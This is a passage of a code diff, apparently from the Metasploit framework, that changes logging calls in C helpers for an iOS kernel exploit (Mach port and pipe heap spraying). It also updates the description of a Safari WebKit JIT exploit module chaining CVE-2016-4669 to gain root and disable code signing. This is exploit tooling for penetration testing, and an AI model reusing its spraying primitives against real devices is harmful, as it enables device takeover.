+	LOG("saved to %s, write ret: %d", dest, ret);
 	close(fd);
 
 	sync();
@@ -90,13 +90,13 @@ mach_port_t alloc_port()
 
 	err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
 	if (err != KERN_SUCCESS) {
-		NSLog(@"mach_port_allocate failed to allocate a port");
+		LOG("mach_port_allocate failed to allocate a port");
 	}
 
 	// insert a send right:
 	err = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
 	if (err != KERN_SUCCESS) {
-		NSLog(@"mach_port_insert_right failed");
+		LOG("mach_port_insert_right failed");
 	}
 
 	return port;
@@ -147,7 +147,7 @@ kern_return_t kalloc_ool_ports(mach_port_t port, mach_port_t ool_port, size_t cn
 			MACH_PORT_NULL);
 
 	if (err != KERN_SUCCESS) {
-		NSLog(@"sending kalloc.8 message failed %s\n", mach_error_string(err));
+		LOG("sending kalloc.8 message failed %s\n", mach_error_string(err));
 	}
 
 	return err;
@@ -176,7 +176,7 @@ void discard_message(mach_port_t port)
 			0,
 			0);
 	if (err != KERN_SUCCESS){
-		NSLog(@"error receiving on port: %s\n", mach_error_string(err));
+		LOG("error receiving on port: %s\n", mach_error_string(err));
 	}
 
 	mach_msg_destroy(msg);
@@ -187,7 +187,7 @@ void hexdump(void *ptr, size_t n)
 	uint32_t *u32 = ptr;
 
 	for (int i=0; i<n; i+=2) {
-		NSLog(@"%08X %08X", u32[i], u32[i+1]);
+		LOG("%08X %08X", u32[i], u32[i+1]);
 	}
 }
 
@@ -195,7 +195,7 @@ int pipe_create(int fds[2])
 {
 	int ret = pipe(fds);
 	if (ret < 0) {
-		NSLog(@"pipe allocation failed errno: %d", errno);
+		LOG("pipe allocation failed errno: %d", errno);
 		return -1;
 	}
 
@@ -206,7 +206,7 @@ int pipe_alloc(int fds[2], void *buf, size_t size)
 {
 	int ret = write(fds[1], buf, size);
 	if (ret < 0) {
-		NSLog(@"pipe write failed, fd: %d, errno: %d", fds[1], errno);
+		LOG("pipe write failed, fd: %d, errno: %d", fds[1], errno);
 		return -1;
 	}
 
@@ -238,7 +238,7 @@ int pipes_alloc(int *pipes, size_t count, char *pipe_buf)
 {
 	for (int i=0; i<count; i++) {
 		if (pipe_alloc(&pipes[i*2], pipe_buf, PAGE_SIZE-1) < 0) {
-			NSLog(@"pipe alloc failed at %d", i);
+			LOG("pipe alloc failed at %d", i);
 			return -1;
 		}
 	}
diff --git a/modules/exploits/apple_ios/browser/safari_jit.rb b/modules/exploits/apple_ios/browser/safari_jit.rb
index 6f10530a08..994521ef6f 100644
--- a/modules/exploits/apple_ios/browser/safari_jit.rb
+++ b/modules/exploits/apple_ios/browser/safari_jit.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ManualRanking
+  Rank = GoodRanking
 
   include Msf::Post::File
   include Msf::Exploit::Remote::HttpServer::HTML
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Safari JIT Exploit',
+        'Name' => 'Safari Webkit JIT Exploit for iOS 7.1.2',
         'Description' => %q{
-          This module exploits a JIT optimisation bug in Safari Webkit. This allows us to
+          This module exploits a JIT optimization bug in Safari Webkit. This allows us to
           write shellcode to an RWX memory section in JavaScriptCore and execute it. The
           shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,
           obtains root and disables code signing. Finally we download and execute the